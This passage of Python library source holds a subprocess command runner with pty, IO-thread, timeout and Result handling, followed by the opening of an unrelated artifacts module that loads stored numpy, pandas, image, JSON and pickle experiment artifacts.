pty=self.using_pty,
)
# Start executing the actual command (runs in background)
self.start(command, shell, env)
self.start_timer(opts["timeout"])
# Arrive at final encoding if neither config nor kwargs had one
self.encoding = opts["encoding"] or self.default_encoding()
# Set up IO thread parameters (format - body_func: {kwargs})
stdout, stderr = [], []
thread_args = {
self.handle_stdout: {
"buffer_": stdout,
"hide": "stdout" in opts["hide"],
"output": out_stream,
}
}
# After opt processing above, in_stream will be a real stream obj or
# False, so we can truth-test it. We don't even create a stdin-handling
# thread if it's False, meaning user indicated stdin is nonexistent or
# problematic.
if in_stream:
thread_args[self.handle_stdin] = {
"input_": in_stream,
"output": out_stream,
"echo": opts["echo_stdin"],
}
if not self.using_pty:
thread_args[self.handle_stderr] = {
"buffer_": stderr,
"hide": "stderr" in opts["hide"],
"output": err_stream,
}
# Kick off IO threads
self.threads = {}
exceptions = []
for target, kwargs in six.iteritems(thread_args):
t = ExceptionHandlingThread(target=target, kwargs=kwargs)
self.threads[target] = t
t.start()
# Wait for completion, then tie things off & obtain result
# And make sure we perform that tying off even if things asplode.
exception = None
while True:
try:
self.wait()
break # done waiting!
# NOTE: we handle all this now instead of at
# actual-exception-handling time because otherwise the stdout/err
# reader threads may block until the subprocess exits.
# TODO: honor other signals sent to our own process and transmit
# them to the subprocess before handling 'normally'.
except KeyboardInterrupt as e:
self.send_interrupt(e)
# NOTE: no break; we want to return to self.wait() since we
# can't know if subprocess is actually terminating due to this
# or not (think REPLs-within-shells, editors, other interactive
# use cases)
except BaseException as e: # Want to handle SystemExit etc still
# Store exception for post-shutdown reraise
exception = e
# Break out of return-to-wait() loop - we want to shut down
break
# Inform stdin-mirroring worker to stop its eternal looping
self.program_finished.set()
# Join threads, setting a timeout if necessary
for target, thread in six.iteritems(self.threads):
thread.join(self._thread_join_timeout(target))
e = thread.exception()
if e is not None:
exceptions.append(e)
# If we got a main-thread exception while wait()ing, raise it now that
# we've closed our worker threads.
if exception is not None:
raise exception
# Strip out WatcherError from any thread exceptions; they are bundled
# into Failure handling at the end.
watcher_errors = []
thread_exceptions = []
for exception in exceptions:
real = exception.value
if isinstance(real, WatcherError):
watcher_errors.append(real)
else:
thread_exceptions.append(exception)
# If any exceptions appeared inside the threads, raise them now as an
# aggregate exception object.
if thread_exceptions:
raise ThreadException(thread_exceptions)
# At this point, we had enough success that we want to be returning or
# raising detailed info about our execution; so we generate a Result.
stdout = "".join(stdout)
stderr = "".join(stderr)
if WINDOWS:
# "Universal newlines" - replace all standard forms of
# newline with \n. This is not technically Windows related
# (\r as newline is an old Mac convention) but we only apply
# the translation for Windows as that's the only platform
# it is likely to matter for these days.
stdout = stdout.replace("\r\n", "\n").replace("\r", "\n")
stderr = stderr.replace("\r\n", "\n").replace("\r", "\n")
# Get return/exit code, unless there were WatcherErrors to handle.
# NOTE: In that case, returncode() may block waiting on the process
# (which may be waiting for user input). Since most WatcherError
# situations lack a useful exit code anyways, skipping this doesn't
# really hurt any.
exited = None if watcher_errors else self.returncode()
# Obtain actual result
result = self.generate_result(
command=command,
shell=shell,
env=env,
stdout=stdout,
stderr=stderr,
exited=exited,
pty=self.using_pty,
hide=opts["hide"],
encoding=self.encoding,
)
# Any presence of WatcherError from the threads indicates a watcher was
# upset and aborted execution; make a generic Failure out of it and
# raise that.
if watcher_errors:
# TODO: ambiguity exists if we somehow get WatcherError in *both*
# threads...as unlikely as that would normally be.
raise Failure(result, reason=watcher_errors[0])
# If a timeout was requested and the subprocess did time out, shout.
timeout = opts["timeout"]
if timeout is not None and self.timed_out:
raise CommandTimedOut(result, timeout=timeout)
if not (result or opts["warn"]):
raise UnexpectedExit(result)
return result
def _run_opts(self, kwargs):
"""
Unify `run` kwargs with config options to arrive at local options.
:returns:
Four-tuple of ``(opts_dict, stdout_stream, stderr_stream,
stdin_stream)``.
"""
opts = {}
for key, value in six.iteritems(self.context.config.run):
runtime = kwargs.pop(key, None)
opts[key] = value if runtime is None else runtime
# Pull in command execution timeout, which stores config elsewhere,
# but only use it if it's actually set (backwards compat)
config_timeout = self.context.config.timeouts.command
opts["timeout"] = kwargs.pop("timeout", config_timeout)
# Handle invalid kwarg keys (anything left in kwargs).
# Act like a normal function would, i.e. TypeError
if kwargs:
err = "run() got an unexpected keyword argument '{}'"
raise TypeError(err.format(list(kwargs.keys())[0]))
# If hide was True, turn off echoing
if opts["hide"] is True:
opts["echo"] = False
# Conversely, ensure echoing is always on when dry-running
if opts["dry"] is True:
opts["echo"] = True
# Then normalize 'hide' from one of the various valid input values,
# into a stream-names tuple.
opts["hide"] = normalize_hide(opts["hide"])
# Derive stream objects
out_stream = opts["out_stream"]
if out_stream is None:
out_stream = sys.stdout
err_stream = opts["err_stream"]
if err_stream is None:
err_stream = sys.stderr
in_stream = opts["in_stream"]
if in_stream is None:
in_stream = sys.stdin
# Determine pty or no
self.using_pty = self.should_use_pty(opts["pty"], opts["fallback"])
if opts["watchers"]:
self.watchers = opts["watchers"]
return opts, out_stream, err_stream, in_stream
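    # Illustrative example of the merge above: if the config has run.echo == False and
    # the caller passes echo=True, the runtime kwarg wins; omitting the kwarg (or
    # passing None) falls back to the configured value.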
def _thread_join_timeout(self, target):
# Add a timeout to out/err thread joins when it looks like they're not
# dead but their counterpart is dead; this indicates issue #351 (fixed
# by #432) where the subproc may hang because its stdout (or stderr) is
# no longer being consumed by the dead thread (and a pipe is filling
# up.) In that case, the non-dead thread is likely to block forever on
# a `recv` unless we add this timeout.
if target == self.handle_stdin:
return None
opposite = self.handle_stderr
if target == self.handle_stderr:
opposite = self.handle_stdout
if opposite in self.threads and self.threads[opposite].is_dead:
return 1
return None
def generate_result(self, **kwargs):
"""
Create & return a suitable `Result` instance from the given ``kwargs``.
Subclasses may wish to override this in order to manipulate things or
generate a `Result` subclass (e.g. ones containing additional metadata
besides the default).
.. versionadded:: 1.0
"""
return Result(**kwargs)
def read_proc_output(self, reader):
"""
Iteratively read & decode bytes from a subprocess' out/err stream.
:param reader:
A literal reader function/partial, wrapping the actual stream
object in question, which takes a number of bytes to read, and
returns that many bytes (or ``None``).
``reader`` should be a reference to either `read_proc_stdout` or
`read_proc_stderr`, which perform the actual, platform/library
specific read calls.
:returns:
A generator yielding Unicode strings (`unicode` on Python 2; `str`
on Python 3).
Specifically, each resulting string is the result of decoding
`read_chunk_size` bytes read from the subprocess' out/err stream.
.. versionadded:: 1.0
"""
# NOTE: Typically, reading from any stdout/err (local, remote or
# otherwise) can be thought of as "read until you get nothing back".
# This is preferable over "wait until an out-of-band signal claims the
# process is done running" because sometimes that signal will appear
# before we've actually read all the data in the stream (i.e.: a race
# condition).
while True:
data = reader(self.read_chunk_size)
if not data:
break
yield self.decode(data)
def write_our_output(self, stream, string):
"""
Write ``string`` to ``stream``.
Also calls ``.flush()`` on ``stream`` to ensure that real terminal
streams don't buffer.
:param stream:
A file-like stream object, mapping to the ``out_stream`` or
``err_stream`` parameters of `run`.
:param string: A Unicode string object.
:returns: ``None``.
.. versionadded:: 1.0
"""
stream.write(encode_output(string, self.encoding))
stream.flush()
def _handle_output(self, buffer_, hide, output, reader):
# TODO: store un-decoded/raw bytes somewhere as well...
for data in self.read_proc_output(reader):
# Echo to local stdout if necessary
# TODO: should we rephrase this as "if you want to hide, give me a
# dummy output stream, e.g. something like /dev/null"? Otherwise, a
# combo of 'hide=stdout' + 'here is an explicit out_stream' means
# out_stream is never written to, and that seems...odd.
if not hide:
self.write_our_output(stream=output, string=data)
# Store in shared buffer so main thread can do things with the
# result after execution completes.
# NOTE: this is threadsafe insofar as no reading occurs until after
# the thread is join()'d.
buffer_.append(data)
# Run our specific buffer through the autoresponder framework
self.respond(buffer_)
def handle_stdout(self, buffer_, hide, output):
"""
Read process' stdout, storing into a buffer & printing/parsing.
Intended for use as a thread target. Only terminates when all stdout
from the subprocess has been read.
:param buffer_: The capture buffer shared with the main thread.
:param bool hide: Whether or not to replay data into ``output``.
:param output:
Output stream (file-like object) to write data into when not
hiding.
:returns: ``None``.
.. versionadded:: 1.0
"""
self._handle_output(
buffer_, hide, output, reader=self.read_proc_stdout
)
def handle_stderr(self, buffer_, hide, output):
"""
Read process' stderr, storing into a buffer & printing/parsing.
Identical to `handle_stdout` except for the stream read from; see its
docstring for API details.
.. versionadded:: 1.0
"""
self._handle_output(
buffer_, hide, output, reader=self.read_proc_stderr
)
def read_our_stdin(self, input_):
"""
Read & decode bytes from a local stdin stream.
:param input_:
Actual stream object to read from. Maps to ``in_stream`` in `run`,
so will often be ``sys.stdin``, but might be any stream-like
object.
:returns:
A Unicode string, the result of decoding the read bytes (this might
be the empty string if the pipe has closed/reached EOF); or
``None`` if stdin wasn't ready for reading yet.
.. versionadded:: 1.0
"""
# TODO: consider moving the character_buffered contextmanager call in
# here? Downside is it would be flipping those switches for every byte
# read instead of once per session, which could be costly (?).
bytes_ = None
if ready_for_reading(input_):
bytes_ = input_.read(bytes_to_read(input_))
# Decode if it appears to be binary-type. (From real terminal
# streams, usually yes; from file-like objects, often no.)
if bytes_ and isinstance(bytes_, six.binary_type):
# TODO: will decoding 1 byte at a time break multibyte
# character encodings? How to square interactivity with that?
bytes_ = self.decode(bytes_)
return bytes_
def handle_stdin(self, input_, output, echo):
"""
Read local stdin, copying into process' stdin as necessary.
Intended for use as a thread target.
.. note::
Because real terminal stdin streams have no well-defined "end", if
such a stream is detected (based on existence of a callable
``.fileno()``) this method will wait until `program_finished` is
set, before terminating.
When the stream doesn't appear to be from a terminal, the same
semantics as `handle_stdout` are used - the stream is simply
``read()`` from until it returns an empty value.
:param input_: Stream (file-like object) from which to read.
:param output: Stream (file-like object) to which echoing may occur.
:param bool echo: User override option for stdin-stdout echoing.
:returns: ``None``.
.. versionadded:: 1.0
"""
# TODO: reinstate lock/whatever thread logic from fab v1 which prevents
# reading from stdin while other parts of the code are prompting for
# runtime passwords? (search for 'input_enabled')
# TODO: fabric#1339 is strongly related to this, if it's not literally
# exposing some regression in Fabric 1.x itself.
closed_stdin = False
with character_buffered(input_):
while True:
data = self.read_our_stdin(input_)
if data:
# Mirror what we just read to process' stdin.
# We perform an encode so Python 3 gets bytes (streams +
# str's in Python 3 == no bueno) but skip the decode step,
# since there's presumably no need (nobody's interacting
# with this data programmatically).
self.write_proc_stdin(data)
# Also echo it back to local stdout (or whatever
# out_stream is set to) when necessary.
if echo is None:
echo = self.should_echo_stdin(input_, output)
if echo:
self.write_our_output(stream=output, string=data)
# Empty string/char/byte != None. Can't just use 'else' here.
elif data is not None:
# When reading from file-like objects that aren't "real"
# terminal streams, an empty byte signals EOF.
if not self.using_pty and not closed_stdin:
self.close_proc_stdin()
closed_stdin = True
# Dual all-done signals: program being executed is done
# running, *and* we don't seem to be reading anything out of
# stdin. (NOTE: If we only test the former, we may encounter
# race conditions re: unread stdin.)
if self.program_finished.is_set() and not data:
break
# Take a nap so we're not chewing CPU.
time.sleep(self.input_sleep)
def should_echo_stdin(self, input_, output):
"""
Determine whether data read from ``input_`` should echo to ``output``.
Used by `handle_stdin`; tests attributes of ``input_`` and ``output``.
:param input_: Input stream (file-like object).
:param output: Output stream (file-like object).
:returns: A ``bool``.
.. versionadded:: 1.0
"""
return (not self.using_pty) and isatty(input_)
def respond(self, buffer_):
"""
Write to the program's stdin in response to patterns in ``buffer_``.
The patterns and responses are driven by the `.StreamWatcher` instances
from the ``watchers`` kwarg of `run` - see :doc:`/concepts/watchers`
for a conceptual overview.
:param buffer:
The capture buffer for this thread's particular IO stream.
:returns: ``None``.
.. versionadded:: 1.0
"""
# Join buffer contents into a single string; without this,
# StreamWatcher subclasses can't do things like iteratively scan for
# pattern matches.
# NOTE: using string.join should be "efficient enough" for now, re:
# speed and memory use. Should that become false, consider using
# StringIO or cStringIO (tho the latter doesn't do Unicode well?) which
# is apparently even more efficient.
stream = u"".join(buffer_)
for watcher in self.watchers:
for response in watcher.submit(stream):
self.write_proc_stdin(response)
def generate_env(self, env, replace_env):
"""
Return a suitable environment dict based on user input & behavior.
:param dict env: Dict supplying overrides or full env, depending.
:param bool replace_env:
Whether ``env`` updates, or is used in place of, the value of
`os.environ`.
:returns: A dictionary of shell environment vars.
.. versionadded:: 1.0
"""
return env if replace_env else dict(os.environ, **env)
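    # Illustrative example: generate_env({"FOO": "1"}, replace_env=False) yields a copy
    # of os.environ updated with FOO, while replace_env=True returns {"FOO": "1"} as the
    # child's entire environment.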
def should_use_pty(self, pty, fallback):
"""
Should execution attempt to use a pseudo-terminal?
:param bool pty:
Whether the user explicitly asked for a pty.
:param bool fallback:
Whether falling back to non-pty execution should be allowed, in
situations where ``pty=True`` but a pty could not be allocated.
.. versionadded:: 1.0
"""
# NOTE: fallback not used: no falling back implemented by default.
return pty
@property
def has_dead_threads(self):
"""
Detect whether any IO threads appear to have terminated unexpectedly.
Used during process-completion waiting (in `wait`) to ensure we don't
deadlock our child process if our IO processing threads have
errored/died.
:returns:
``True`` if any threads appear to have terminated with an
exception, ``False`` otherwise.
.. versionadded:: 1.0
"""
return any(x.is_dead for x in self.threads.values())
def wait(self):
"""
Block until the running command appears to have exited.
:returns: ``None``.
.. versionadded:: 1.0
"""
while True:
proc_finished = self.process_is_finished
dead_threads = self.has_dead_threads
if proc_finished or dead_threads:
break
time.sleep(self.input_sleep)
def write_proc_stdin(self, data):
"""
Write encoded ``data`` to the running process' stdin.
:param data: A Unicode string.
:returns: ``None``.
.. versionadded:: 1.0
"""
# Encode always, then request implementing subclass to perform the
# actual write to subprocess' stdin.
self._write_proc_stdin(data.encode(self.encoding))
def decode(self, data):
"""
Decode some ``data`` bytes, returning Unicode.
.. versionadded:: 1.0
"""
# NOTE: yes, this is a 1-liner. The point is to make it much harder to
# forget to use 'replace' when decoding :)
return data.decode(self.encoding, "replace")
@property
def process_is_finished(self):
"""
Determine whether our subprocess has terminated.
.. note::
The implementation of this method should be nonblocking, as it is
used within a query/poll loop.
:returns:
``True`` if the subprocess has finished running, ``False``
otherwise.
.. versionadded:: 1.0
"""
raise NotImplementedError
def start(self, command, shell, env):
"""
Initiate execution of ``command`` (via ``shell``, with ``env``).
Typically this means use of a forked subprocess or requesting start of
execution on a remote system.
In most cases, this method will also set subclass-specific member
variables used in other methods such as `wait` and/or `returncode`.
:param str command:
Command string to execute.
:param str shell:
Shell to use when executing ``command``.
:param dict env:
Environment dict used to prep shell environment.
.. versionadded:: 1.0
"""
raise NotImplementedError
def start_timer(self, timeout):
"""
Start a timer to `kill` our subprocess after ``timeout`` seconds.
"""
if timeout is not None:
self._timer = threading.Timer(timeout, self.kill)
self._timer.start()
def read_proc_stdout(self, num_bytes):
"""
Read ``num_bytes`` from the running process' stdout stream.
:param int num_bytes: Number of bytes to read at maximum.
:returns: A string/bytes object.
.. versionadded:: 1.0
"""
raise NotImplementedError
def read_proc_stderr(self, num_bytes):
"""
Read ``num_bytes`` from the running process' stderr stream.
:param int num_bytes: Number of bytes to read at maximum.
:returns: A string/bytes object.
.. versionadded:: 1.0
"""
raise NotImplementedError
def _write_proc_stdin(self, data):
"""
Write ``data`` to running process' stdin.
This should never be called directly; it's for subclasses to implement.
See `write_proc_stdin` for the public API call.
:param data: Already-encoded byte data suitable for writing.
:returns: ``None``.
.. versionadded:: 1.0
"""
raise NotImplementedError
def close_proc_stdin(self):
"""
Close running process' stdin.
:returns: ``None``.
.. versionadded:: 1.3
"""
raise NotImplementedError
def default_encoding(self):
"""
Return a string naming the expected encoding of subprocess streams.
This return value should be suitable for use by encode/decode methods.
.. versionadded:: 1.0
"""
# TODO: probably wants to be 2 methods, one for local and one for
# subprocess. For now, good enough to assume both are the same.
return default_encoding()
def send_interrupt(self, interrupt):
"""
Submit an interrupt signal to the running subprocess.
In almost all implementations, the default behavior is what will be
desired: submit ``\x03`` to the subprocess' stdin pipe. However, we
leave this as a public method in case this default needs to be
augmented or replaced.
:param interrupt:
The locally-sourced ``KeyboardInterrupt`` causing the method call.
:returns: ``None``.
.. versionadded:: 1.0
"""
self.write_proc_stdin(u"\x03")
def returncode(self):
"""
Return the numeric return/exit code resulting from command execution.
:returns: `int`
.. versionadded:: 1.0
"""
raise NotImplementedError
def stop(self):
"""
Perform final cleanup, if necessary.
This method is called within a ``finally`` clause inside the main `run`
method. Depending on the subclass, it may be a no-op, or it may do
things such as close network connections or open files.
:returns: ``None``
.. versionadded:: 1.0
"""
raise NotImplementedError
def stop_timer(self):
"""
Cancel an open timeout timer, if required.
"""
# TODO 2.0: merge with stop() (i.e. make stop() something users extend
# and call super() in, instead of completely overriding, then just move
# this into the default implementation of stop().
# TODO: this
if self._timer:
self._timer.cancel()
def kill(self):
"""
Forcibly terminate the subprocess.
Typically only used by the timeout functionality.
This is often a "best-effort" attempt, e.g. remote subprocesses often
must settle for simply shutting down the local side of the network
connection and hoping the remote end eventually gets the message.
"""
raise NotImplementedError
@property
def timed_out(self):
"""
Returns ``True`` if the subprocess stopped because it timed out.
.. versionadded:: 1.3
"""
# Timer expiry implies we did time out. (The timer itself will have
# killed the subprocess, allowing us to even get to this point.)
return self._timer and not self._timer.is_alive()
class Local(Runner):
"""
Execute a command on the local system in a subprocess.
.. note::
When Invoke itself is executed without a controlling terminal (e.g.
when ``sys.stdin`` lacks a useful ``fileno``), it's not possible to
present a handle on our PTY to local subprocesses. In such situations,
        `Local` will fall back to behaving as if ``pty=False`` (on the theory
that degraded execution is better than none at all) as well as printing
a warning to stderr.
To disable this behavior, say ``fallback=False``.
.. versionadded:: 1.0
"""
def __init__(self, context):
super(Local, self).__init__(context)
# Bookkeeping var for pty use case
self.status = None
def should_use_pty(self, pty=False, fallback=True):
use_pty = False
if pty:
use_pty = True
# TODO: pass in & test in_stream, not sys.stdin
if not has_fileno(sys.stdin) and fallback:
if not self.warned_about_pty_fallback:
err = "WARNING: stdin has no fileno; falling back to non-pty execution!\n" # noqa
sys.stderr.write(err)
self.warned_about_pty_fallback = True
use_pty = False
return use_pty
def read_proc_stdout(self, num_bytes):
# Obtain useful read-some-bytes function
if self.using_pty:
# Need to handle spurious OSErrors on some Linux platforms.
try:
data = os.read(self.parent_fd, num_bytes)
except OSError as e:
# Only eat I/O specific OSErrors so we don't hide others
stringified = str(e)
io_errors = (
# The typical default
"Input/output error",
# Some less common platforms phrase it this way
"I/O error",
)
if not any(error in stringified for error in io_errors):
raise
# The bad OSErrors happen after all expected output has
# appeared, so we return a falsey value, which triggers the
# "end of output" logic in code using reader functions.
data = None
else:
data = os.read(self.process.stdout.fileno(), num_bytes)
return data
def read_proc_stderr(self, num_bytes):
# NOTE: when using a pty, this will never be called.
# TODO: do we ever get those OSErrors on stderr? Feels like we could?
return os.read(self.process.stderr.fileno(), num_bytes)
def _write_proc_stdin(self, data):
# NOTE: parent_fd from os.fork() is a read/write pipe attached to our
# forked process' stdout/stdin, respectively.
fd = self.parent_fd if self.using_pty else self.process.stdin.fileno()
# Try to write, ignoring broken pipes if encountered (implies child
# process exited before the process piping stdin to us finished;
# there's nothing we can do about that!)
try:
return os.write(fd, data)
except OSError as e:
if "Broken pipe" not in str(e):
raise
def close_proc_stdin(self):
if self.using_pty:
            # There is no working scenario for telling the process that stdin
            # has closed when using a pty.
raise SubprocessPipeError("Cannot close stdin when pty=True")
self.process.stdin.close()
def start(self, command, shell, env):
if self.using_pty:
if pty is None: # Encountered ImportError
err = "You indicated pty=True, but your platform doesn't support the 'pty' module!" # noqa
sys.exit(err)
cols, rows = pty_size()
self.pid, self.parent_fd = pty.fork()
# If we're the child process, load up the actual command in a
# shell, just as subprocess does; this replaces our process - whose
# pipes are all hooked up to the PTY - with the "real" one.
if self.pid == 0:
# TODO: both pty.spawn() and pexpect.spawn() do a lot of
# setup/teardown involving tty.setraw, getrlimit, signal.
# Ostensibly we'll want some of that eventually, but if
# possible write tests - integration-level if necessary -
# before adding it!
#
# Set pty window size based on what our own controlling
# terminal's window size appears to be.
# TODO: make subroutine?
winsize = struct.pack("HHHH", rows, cols, 0, 0)
fcntl.ioctl(sys.stdout.fileno(), termios.TIOCSWINSZ, winsize)
# Use execve for bare-minimum "exec w/ variable # args + env"
# behavior. No need for the 'p' (use PATH to find executable)
# for now.
# TODO: see if subprocess is using equivalent of execvp...
os.execve(shell, [shell, "-c", command], env)
else:
self.process = Popen(
command,
shell=True,
executable=shell,
env=env,
stdout=PIPE,
stderr=PIPE,
stdin=PIPE,
)
def kill(self):
pid = self.pid if self.using_pty else self.process.pid
os.kill(pid, signal.SIGKILL)
@property
def process_is_finished(self):
if self.using_pty:
# NOTE:
# https://github.com/pexpect/ptyprocess/blob/4058faa05e2940662ab6da1330aa0586c6f9cd9c/ptyprocess/ptyprocess.py#L680-L687
# implies that Linux "requires" use of the blocking, non-WNOHANG
# version of this call. Our testing doesn't verify this, however,
# so...
# NOTE: It does appear to be totally blocking on Windows, so our
# issue #351 may be totally unsolvable there. Unclear.
pid_val, self.status = os.waitpid(self.pid, os.WNOHANG)
return pid_val != 0
else:
return self.process.poll() is not None
def returncode(self):
if self.using_pty:
# No subprocess.returncode available; use WIFEXITED/WIFSIGNALED to
            # determine which of WEXITSTATUS / WTERMSIG to use.
# TODO: is it safe to just say "call all WEXITSTATUS/WTERMSIG and
# return whichever one of them is nondefault"? Probably not?
# NOTE: doing this in an arbitrary order should be safe since only
# one of the WIF* methods ought to ever return True.
code = None
if os.WIFEXITED(self.status):
code = os.WEXITSTATUS(self.status)
elif os.WIFSIGNALED(self.status):
code = os.WTERMSIG(self.status)
# Match subprocess.returncode by turning signals into negative
# 'exit code' integers.
code = -1 * code
return code
# TODO: do we care about WIFSTOPPED? Maybe someday?
else:
return self.process.returncode
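        # Illustrative example: a pty child that exits normally with status 2 yields 2,
        # while one killed by SIGKILL yields -9, mirroring subprocess.Popen.returncode's
        # negative-signal convention.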
def stop(self):
# No explicit close-out required (so far).
pass
class Result(object):
"""
A container for information about the result of a command execution.
All params are exposed as attributes of the same name and type.
:param str stdout:
The subprocess' standard output.
:param str stderr:
Same as ``stdout`` but containing standard error (unless the process
was invoked via a pty, in which case it will be empty; see
`.Runner.run`.)
:param str encoding:
The string encoding used by the local shell environment.
:param str command:
The command which was executed.
:param str shell:
The shell binary used for execution.
:param dict env:
The shell environment used for execution. (Default is the empty dict,
``{}``, not ``None`` as displayed in the signature.)
:param int exited:
An integer representing the subprocess' exit/return code.
.. note::
This may be ``None`` in situations where the subprocess did not run
to completion, such as when auto-responding failed or a timeout was
reached.
:param bool pty:
A boolean describing whether the subprocess was invoked with a pty or
not; see `.Runner.run`.
:param tuple hide:
A tuple of stream names (none, one or both of ``('stdout', 'stderr')``)
which were hidden from the user when the generating command executed;
this is a normalized value derived from the ``hide`` parameter of
`.Runner.run`.
For example, ``run('command', hide='stdout')`` will yield a `Result`
where ``result.hide == ('stdout',)``; ``hide=True`` or ``hide='both'``
results in ``result.hide == ('stdout', 'stderr')``; and ``hide=False``
(the default) generates ``result.hide == ()`` (the empty tuple.)
.. note::
`Result` objects' truth evaluation is equivalent to their `.ok`
attribute's value. Therefore, quick-and-dirty expressions like the
following are possible::
if run("some shell command"):
do_something()
else:
handle_problem()
However, remember `Zen of Python #2
<http://zen-of-python.info/explicit-is-better-than-implicit.html#2>`_.
.. versionadded:: 1.0
"""
# TODO: inherit from namedtuple instead? heh (or: use attrs from pypi)
def __init__(
self,
stdout="",
stderr="",
encoding=None,
command="",
shell="",
env=None,
exited=0,
pty=False,
hide=tuple(),
):
self.stdout = stdout
self.stderr = stderr
if encoding is None:
encoding = default_encoding()
self.encoding = encoding
self.command = command
self.shell = shell
self.env = {} if env is None else env
self.exited = exited
self.pty = pty
self.hide = hide
@property
def return_code(self):
"""
An alias for ``.exited``.
.. versionadded:: 1.0
"""
return self.exited
def __nonzero__(self):
# NOTE: This is the method that (under Python 2) determines Boolean
# behavior for objects.
return self.ok
def __bool__(self):
# NOTE: And this is the Python 3 equivalent of __nonzero__. Much better
# name...
return self.__nonzero__()
def __str__(self):
if self.exited is not None:
desc = "Command exited with status {}.".format(self.exited)
else:
desc = "Command was not fully executed due to watcher error."
ret = [desc]
for x in ("stdout", "stderr"):
val = getattr(self, x)
ret.append(
u"""=== {} ===
{}
""".format(
x, val.rstrip()
)
if val
else u"(no {})".format(x)
)
return u"\n".join(ret)
def __repr__(self):
# TODO: more? e.g. len of stdout/err? (how to represent cleanly in a
# 'x=y' format like this? e.g. '4b' is ambiguous as to what it
        # represents?)
template = "<Result cmd={!r} exited={}>"
return template.format(self.command, self.exited)
@property
def ok(self):
"""
A boolean equivalent to ``exited == 0``.
.. versionadded:: 1.0
"""
return self.exited == 0
@property
def failed(self):
"""
The inverse of ``ok``.
I.e., ``True`` if the program exited with a nonzero return code, and
``False`` otherwise.
.. versionadded:: 1.0
"""
return not self.ok
def tail(self, stream, count=10):
"""
Return the last ``count`` lines of ``stream``, plus leading whitespace.
:param str stream:
Name of some captured stream attribute, eg ``"stdout"``.
:param int count:
Number of lines to preserve.
.. versionadded:: 1.3
"""
# TODO: preserve alternate line endings? Mehhhh
# NOTE: no trailing \n preservation; easier for below display if
# normalized
text = "\n\n" + "\n".join(getattr(self, stream).splitlines()[-count:])
return encode_output(text, self.encoding)
def normalize_hide(val):
hide_vals = (None, False, "out", "stdout", "err", "stderr", "both", True)
if val not in hide_vals:
err = "'hide' got {!r} which is not in {!r}"
raise ValueError(err.format(val, hide_vals))
if val in (None, False):
hide = ()
elif val in ("both", True):
hide = ("stdout", "stderr")
elif val == "out":
hide = ("stdout",)
elif val == "err":
hide = ("stderr",)
else:
hide = (val,)
return hide
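# Illustrative examples of the normalization above:
#     normalize_hide(None) == ()                      # show everything
#     normalize_hide('out') == ('stdout',)
#     normalize_hide(True) == ('stdout', 'stderr')
#     normalize_hide('nope')                          # raises ValueError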
def default_encoding():
"""
Obtain apparent interpreter-local default text encoding.
Often used as a baseline in situations where we must use SOME encoding for
unknown-but-presumably-text bytes, and the user has not specified an
override.
"""
# Based on some experiments there is an issue with
# `locale.getpreferredencoding(do_setlocale=False)` in Python 2.x on
# Linux and OS X, and `locale.getpreferredencoding(do_setlocale=True)`
# triggers some global state changes. (See #274 for discussion.)
encoding = locale.getpreferredencoding(False)
if six.PY2 and not WINDOWS:
default = locale.getdefaultlocale()[1]
if default is not None:
encoding = default
return encoding
|
artifacts.py
|
import hashlib
import json
import mimetypes
import os
import pickle
from six.moves.urllib.parse import quote
from copy import deepcopy
from datetime import datetime
from multiprocessing import RLock, Event
from multiprocessing.pool import ThreadPool
from tempfile import mkdtemp, mkstemp
from threading import Thread
from time import time
from zipfile import ZipFile, ZIP_DEFLATED
import humanfriendly
import six
from PIL import Image
from pathlib2 import Path
from six.moves.urllib.parse import urlparse
from typing import Dict, Union, Optional, Any, Sequence
from ..backend_api import Session
from ..backend_api.services import tasks
from ..backend_interface.metrics.events import UploadEvent
from ..debugging.log import LoggerRoot
from ..storage.helper import remote_driver_schemes
try:
import pandas as pd
DataFrame = pd.DataFrame
except ImportError:
pd = None
DataFrame = None
try:
import numpy as np
except ImportError:
np = None
try:
from pathlib import Path as pathlib_Path
except ImportError:
pathlib_Path = None
class Artifact(object):
"""
Read-Only Artifact object
"""
@property
def url(self):
# type: () -> str
"""
:return: The URL of uploaded artifact.
"""
return self._url
@property
def name(self):
# type: () -> str
"""
:return: The name of artifact.
"""
return self._name
@property
def size(self):
# type: () -> int
"""
:return: The size in bytes of artifact.
"""
return self._size
@property
def type(self):
# type: () -> str
"""
        :return: The type (str) of the artifact.
"""
return self._type
@property
def mode(self):
# type: () -> Union["input", "output"] # noqa: F821
"""
        :return: The mode (str) of the artifact: "input" or "output".
"""
return self._mode
@property
def hash(self):
# type: () -> str
"""
        :return: SHA2 hash (str) of the artifact content.
"""
return self._hash
@property
def timestamp(self):
# type: () -> datetime
"""
:return: Timestamp (datetime) of uploaded artifact.
"""
return self._timestamp
@property
def metadata(self):
# type: () -> Optional[Dict[str, str]]
"""
:return: Key/Value dictionary attached to artifact.
"""
return self._metadata
@property
def preview(self):
# type: () -> str
"""
:return: A string (str) representation of the artifact.
"""
return self._preview
def __init__(self, artifact_api_object):
"""
construct read-only object from api artifact object
:param tasks.Artifact artifact_api_object:
"""
self._name = artifact_api_object.key
self._size = artifact_api_object.content_size
self._type = artifact_api_object.type
self._mode = artifact_api_object.mode
self._url = artifact_api_object.uri
self._hash = artifact_api_object.hash
self._timestamp = datetime.fromtimestamp(artifact_api_object.timestamp)
self._metadata = dict(artifact_api_object.display_data) if artifact_api_object.display_data else {}
self._preview = artifact_api_object.type_data.preview if artifact_api_object.type_data else None
self._object = None
def get(self):
# type: () -> Any
"""
Return an object constructed from the artifact file
Currently supported types: Numpy.array, pandas.DataFrame, PIL.Image, dict (json)
        All other types will return a pathlib2.Path object pointing to a local copy of the artifact's file (or directory)
:return: One of the following objects Numpy.array, pandas.DataFrame, PIL.Image, dict (json), or pathlib2.Path.
"""
if self._object:
return self._object
local_file = self.get_local_copy(raise_on_error=True)
# noinspection PyProtectedMember
if self.type == 'numpy' and np:
self._object = np.load(local_file)[self.name]
elif self.type in ('pandas', Artifacts._pd_artifact_type) and pd:
self._object = pd.read_csv(local_file)
elif self.type == 'image':
self._object = Image.open(local_file)
elif self.type == 'JSON':
with open(local_file, 'rt') as f:
self._object = json.load(f)
elif self.type == 'string':
with open(local_file, 'rt') as f:
self._object = f.read()
elif self.type == 'pickle':
with open(local_file, 'rb') as f:
self._object = pickle.load(f)
local_file = Path(local_file)
if self._object is None:
self._object = local_file
return self._object
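    # Illustrative usage sketch (assumes an Artifact instance obtained from a task's
    # artifact registry; the accessor name is an assumption):
    #     artifact = task.artifacts['training_data']
    #     obj = artifact.get()             # e.g. a pandas.DataFrame for 'pandas' artifacts
    #     path = artifact.get_local_copy()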
def get_local_copy(self, extract_archive=True, raise_on_error=False):
